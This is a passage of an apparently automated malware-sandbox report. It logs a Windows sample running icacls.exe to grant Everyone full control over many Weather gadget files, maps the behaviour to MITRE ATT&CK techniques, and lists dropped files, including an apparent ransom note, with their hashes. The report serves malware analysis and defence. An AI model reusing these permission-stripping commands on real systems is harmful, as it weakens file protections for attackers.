  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\41.png /grant Everyone:F /T /C /Q
  2⤵
  PID:8100
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\42.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5936
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\43.png /grant Everyone:F /T /C /Q
  2⤵
  PID:832
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\44.png /grant Everyone:F /T /C /Q
  2⤵
  PID:1632
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\45.png /grant Everyone:F /T /C /Q
  2⤵
  PID:8180
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\46.png /grant Everyone:F /T /C /Q
  2⤵
  PID:4884
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\47.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3612
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\5.png /grant Everyone:F /T /C /Q
  2⤵
  PID:1140
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\6.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5188
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\7.png /grant Everyone:F /T /C /Q
  2⤵
  PID:2720
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\8.png /grant Everyone:F /T /C /Q
  2⤵
  PID:7188
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\9.png /grant Everyone:F /T /C /Q
  2⤵
  PID:6300
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\activity16v.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3644
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\alertIcon.png /grant Everyone:F /T /C /Q
  2⤵
  PID:7276
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_down.png /grant Everyone:F /T /C /Q
  2⤵
  PID:4832
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_down_BIDI.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3528
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_over.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5160
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_up.png /grant Everyone:F /T /C /Q
  2⤵
  PID:8124
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_down_BIDI.png /grant Everyone:F /T /C /Q
  2⤵
  PID:2360
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_down.png /grant Everyone:F /T /C /Q
  2⤵
  PID:2080
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_over.png /grant Everyone:F /T /C /Q
  2⤵
  PID:108
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_over_BIDI.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3556
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_up.png /grant Everyone:F /T /C /Q
  2⤵
  PID:1292
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_up_BIDI.png /grant Everyone:F /T /C /Q
  2⤵
  PID:6120
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\divider-horizontal.png /grant Everyone:F /T /C /Q
  2⤵
  PID:6324
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\divider-vertical.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3524
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked-loading.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5960
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_cloudy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3580
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_few-showers.png /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3600
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_foggy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:1144
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_hail.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3596
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-first-quarter.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5444
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-first-quarter_partly-cloudy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3840
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-full.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5220
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-full_partly-cloudy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:2176
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-last-quarter.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5340
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-last-quarter_partly-cloudy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3924
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-new.png /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5476
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-new_partly-cloudy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3664
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-crescent.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5380
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-crescent_partly-cloudy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:4760
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-gibbous.png /grant Everyone:F /T /C /Q
  2⤵
  PID:7228
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-gibbous_partly-cloudy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:6164
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waxing-crescent.png /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5508
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waxing-crescent_partly-cloudy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:7308
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waxing-gibbous.png /grant Everyone:F /T /C /Q
  2⤵
  PID:7304
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waxing-gibbous_partly-cloudy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5028
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_rainy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:964
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_snow.png /grant Everyone:F /T /C /Q
  2⤵
  PID:7448
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_thunderstorm.png /grant Everyone:F /T /C /Q
  2⤵
  PID:2760
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_partly-cloudy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5072
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_windy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5580
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_snow.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5564
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_sun.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5460
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_windy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5544
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_cloudy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3744
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_few-showers.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5492
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_foggy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:928
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_hail.png /grant Everyone:F /T /C /Q
  2⤵
  PID:4040
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_snow.png /grant Everyone:F /T /C /Q
  2⤵
  PID:2696
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_rainy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:2868
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_thunderstorm.png /grant Everyone:F /T /C /Q
  2⤵
  PID:2932
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\grayStateIcon.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5536
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\greenStateIcon.png /grant Everyone:F /T /C /Q
  2⤵
  PID:2732
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\info.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5032
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\notConnectedStateIcon.png /grant Everyone:F /T /C /Q
  2⤵
  PID:6452
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\search_background.png /grant Everyone:F /T /C /Q
  2⤵
  PID:2788
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\redStateIcon.png /grant Everyone:F /T /C /Q
  2⤵
  PID:2740
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked-loading.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3036
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_cloudy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:6284
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_few-showers.png /grant Everyone:F /T /C /Q
  2⤵
  PID:7860
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_foggy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:912
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_hail.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5208
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-first-quarter.png /grant Everyone:F /T /C /Q
  2⤵
  PID:6256
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-first-quarter_partly-cloudy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5400
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-full.png /grant Everyone:F /T /C /Q
  2⤵
  PID:6416
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-full_partly-cloudy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3420
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-last-quarter.png /grant Everyone:F /T /C /Q
  2⤵
  PID:6472
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-last-quarter_partly-cloudy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3416
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-new.png /grant Everyone:F /T /C /Q
  2⤵
  PID:6916
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-new_partly-cloudy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5036
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waning-crescent.png /grant Everyone:F /T /C /Q
  2⤵
  PID:6808

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:7588

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1813174161726956681-9927766661610030183-1570159493862431972-548184209-28119226"
1⤵
PID:7604

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1885321305981624489-20623394061622787069-26466331215305527841807714704-661877391"
1⤵
PID:7760

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-4815101791660739346983388196-1008518473-2102334680-99790171-474264401-215214504"
1⤵
PID:5472

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "136879667616113198021529926423-1421167815858397529-2012742130-1759062993-606034413"
1⤵
PID:3896

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "10322775681361048160-568023878-136173924111227526411023197488-808931578849135147"
1⤵
PID:7840

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-535844464-69488716-2387774021110889892-1528428034-1971570532820203985-570965323"
1⤵
PID:2824

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "419536436-159149197414812001943232642684560666315514037331421342770-750317322"
1⤵
PID:5744

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "640363032-1832067234132393414214964741541482332056147376441422380927606980921"
1⤵
PID:3616

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-123867535-668999182-20552994461122272735-563233756-1466322992-1829932577184747517"
1⤵
PID:3456

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-18891516006365697981006528156-20171068-966731319-13479970901636006805-583353477"
1⤵
PID:8152

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "121927884-2053870709-1889012438-735954210-35250284-1767346954-1799285928-1796656107"
1⤵
PID:5968

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2034837400-400046013-1514315580-1163384958-1853582837167476566516561003281224259691"
1⤵
PID:3184

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-360086209-4965998571836916605-1789284139-83045598018609763232910211683737944"
1⤵
PID:3660

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-948396255-2075052151-162702674015173809401136573833-18487023621855820007-1098888407"
1⤵
PID:2900

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "949978832-1242475676-855973422-1105709682-346947411-1303299654-1813849816-616153572"
1⤵
PID:4060

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1404041169-1248252196212215931639900335233034385216893391281857699401-1526006972"
1⤵
PID:2884

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\ziwxsmxq.exe

MD5
18126be163eb7df2194bb902c359ba8e

SHA1
6c79d9ca8bf0a3b5f04d317165f48d4eedd04d40

SHA256
a9affdcdb398d437e2e1cd9bc1ccf2d101d79fc6d87e95e960e50847a141faa4

SHA512
4a692579afd1536f70b6ded199d05b1e40d70cb0eae7511f2965f88cc5b024bc55c3a7b3dc90d9b88971f1cd562bb93827707d1cf3c7772fa669632bac2cf1f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Инструкция.txt

MD5
11df6d5f7c1240255a69df1bf2f167dc

SHA1
76924e002d1c4c6d22b8c59db92712a03ef6bae2

SHA256
b0a4c5a7bcbeb8f710835890d544a77c87aa773003aae0e305e886a7745b1bc5

SHA512
e2967e88cc5e1fb04838780f21891b2d5aa8f09797db2be793a716238128c760d3b847931c771b1188754db00022e29aa881f8adb0528f50aea3d87033603a97

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5
c945ebc688f2c0df57a1fbe98e65f4c0

SHA1
f62a042e7664cfeb701c8bd45f5e0e0e4ddca96c

SHA256
b682c3842c9064b77b786633bfe03f9582068d6b10d56717697120624ce6f1c4

SHA512
a338826d4fa3d58dcfbc2631b2f145d23322031c0ec9f1f98224188da03c2e4487c3b1bc88ae61b919ab2cc2a297610b85d8d9078839f90d111ea46875664036

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5
c945ebc688f2c0df57a1fbe98e65f4c0

SHA1
f62a042e7664cfeb701c8bd45f5e0e0e4ddca96c

SHA256
b682c3842c9064b77b786633bfe03f9582068d6b10d56717697120624ce6f1c4

SHA512
a338826d4fa3d58dcfbc2631b2f145d23322031c0ec9f1f98224188da03c2e4487c3b1bc88ae61b919ab2cc2a297610b85d8d9078839f90d111ea46875664036

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/316-94-0x0000000000000000-mapping.dmp

Download
memory/396-92-0x0000000000000000-mapping.dmp

Download
memory/776-79-0x0000000000000000-mapping.dmp

Download
memory/900-75-0x0000000000000000-mapping.dmp

Download
memory/940-69-0x0000000000000000-mapping.dmp

Download
memory/976-74-0x0000000000000000-mapping.dmp

Download
memory/988-93-0x0000000000000000-mapping.dmp

Download
memory/1044-88-0x0000000000000000-mapping.dmp

Download
memory/1168-82-0x0000000000000000-mapping.dmp

Download
memory/1176-98-0x0000000000000000-mapping.dmp

Download
memory/1180-89-0x0000000000000000-mapping.dmp

Download
memory/1276-73-0x0000000000000000-mapping.dmp

Download
memory/1292-86-0x0000000000000000-mapping.dmp

Download
memory/1300-66-0x0000000000000000-mapping.dmp

Download
memory/1328-68-0x0000000000000000-mapping.dmp

Download
memory/1404-67-0x0000000000000000-mapping.dmp

Download
memory/1432-65-0x0000000000000000-mapping.dmp

Download
memory/1516-58-0x000007FEFB781000-0x000007FEFB783000-memory.dmp

Filesize
8KB

Download
memory/1516-63-0x00000000028FB000-0x000000000291A000-memory.dmp

Filesize
124KB

Download
memory/1516-59-0x000007FEEBF20000-0x000007FEECA7D000-memory.dmp

Filesize
11.4MB

Download
memory/1516-60-0x00000000028F0000-0x00000000028F2000-memory.dmp

Filesize
8KB

Download
memory/1516-56-0x0000000000000000-mapping.dmp

Download
memory/1516-61-0x00000000028F2000-0x00000000028F4000-memory.dmp

Filesize
8KB

Download
memory/1516-62-0x00000000028F4000-0x00000000028F7000-memory.dmp

Filesize
12KB

Download
memory/1556-77-0x0000000000000000-mapping.dmp

Download
memory/1608-96-0x0000000000000000-mapping.dmp

Download
memory/1636-90-0x0000000000000000-mapping.dmp

Download
memory/1660-87-0x0000000000000000-mapping.dmp

Download
memory/1720-78-0x0000000000000000-mapping.dmp

Download
memory/1724-84-0x0000000000000000-mapping.dmp

Download
memory/1736-83-0x0000000000000000-mapping.dmp

Download
memory/1748-71-0x0000000000000000-mapping.dmp

Download
memory/1752-76-0x0000000000000000-mapping.dmp

Download
memory/1760-70-0x0000000000000000-mapping.dmp

Download
memory/1780-85-0x0000000000000000-mapping.dmp

Download
memory/1804-64-0x0000000000000000-mapping.dmp

Download
memory/1812-91-0x0000000000000000-mapping.dmp

Download
memory/1820-54-0x0000000000970000-0x0000000000971000-memory.dmp

Filesize
4KB

Download
memory/1820-57-0x000000001AD60000-0x000000001AD62000-memory.dmp

Filesize
8KB

Download
memory/1840-95-0x0000000000000000-mapping.dmp

Download
memory/1876-97-0x0000000000000000-mapping.dmp

Download
memory/2016-72-0x0000000000000000-mapping.dmp

Download
memory/2068-99-0x0000000000000000-mapping.dmp

Download
memory/2080-101-0x0000000000000000-mapping.dmp

Download
memory/2088-105-0x0000000000000000-mapping.dmp

Download
memory/2096-100-0x0000000000000000-mapping.dmp

Download
memory/2104-108-0x0000000000000000-mapping.dmp

Download
memory/2112-113-0x0000000000000000-mapping.dmp

Download
memory/2120-118-0x0000000000000000-mapping.dmp

Download
memory/2136-111-0x0000000000000000-mapping.dmp

Download
memory/2144-119-0x0000000000000000-mapping.dmp

Download
memory/2204-102-0x0000000000000000-mapping.dmp

Download
memory/2228-103-0x0000000000000000-mapping.dmp

Download
memory/2248-104-0x0000000000000000-mapping.dmp

Download
memory/2272-106-0x0000000000000000-mapping.dmp

Download
memory/2300-107-0x0000000000000000-mapping.dmp

Download
memory/2328-109-0x0000000000000000-mapping.dmp

Download
memory/2352-110-0x0000000000000000-mapping.dmp

Download
memory/2376-112-0x0000000000000000-mapping.dmp

Download
memory/2408-114-0x0000000000000000-mapping.dmp

Download
memory/2432-115-0x0000000000000000-mapping.dmp

Download
memory/2444-116-0x0000000000000000-mapping.dmp

Download
memory/2488-117-0x0000000000000000-mapping.dmp

Download
memory/2532-120-0x0000000000000000-mapping.dmp

Download
memory/2548-121-0x0000000000000000-mapping.dmp

Download
memory/2560-122-0x0000000000000000-mapping.dmp

Download
memory/2592-123-0x0000000000000000-mapping.dmp

Download
memory/2608-124-0x0000000000000000-mapping.dmp

Download
memory/2644-125-0x0000000000000000-mapping.dmp

Download
memory/2656-126-0x0000000000000000-mapping.dmp

Download
memory/2688-127-0x0000000000000000-mapping.dmp

Download
memory/2700-128-0x0000000000000000-mapping.dmp

Download
memory/4620-131-0x000007FEEC510000-0x000007FEED06D000-memory.dmp

Filesize
11.4MB

Download
memory/4620-134-0x00000000027A4000-0x00000000027A7000-memory.dmp

Filesize
12KB

Download
memory/4620-133-0x00000000027A2000-0x00000000027A4000-memory.dmp

Filesize
8KB

Download
memory/4620-132-0x00000000027A0000-0x00000000027A2000-memory.dmp

Filesize
8KB

Download
memory/4620-143-0x000000001B750000-0x000000001BA4F000-memory.dmp

Filesize
3.0MB

Download
memory/4620-146-0x00000000027AB000-0x00000000027CA000-memory.dmp

Filesize
124KB

Download
memory/4748-140-0x000007FEEC510000-0x000007FEED06D000-memory.dmp

Filesize
11.4MB

Download
memory/4748-141-0x0000000002520000-0x0000000002522000-memory.dmp

Filesize
8KB

Download
memory/4748-144-0x0000000002524000-0x0000000002527000-memory.dmp

Filesize
12KB

Download
memory/4748-142-0x0000000002522000-0x0000000002524000-memory.dmp

Filesize
8KB

Download
memory/4748-145-0x000000001B6E0000-0x000000001B9DF000-memory.dmp

Filesize
3.0MB

Download
memory/4748-147-0x000000000252B000-0x000000000254A000-memory.dmp

Filesize
124KB

Download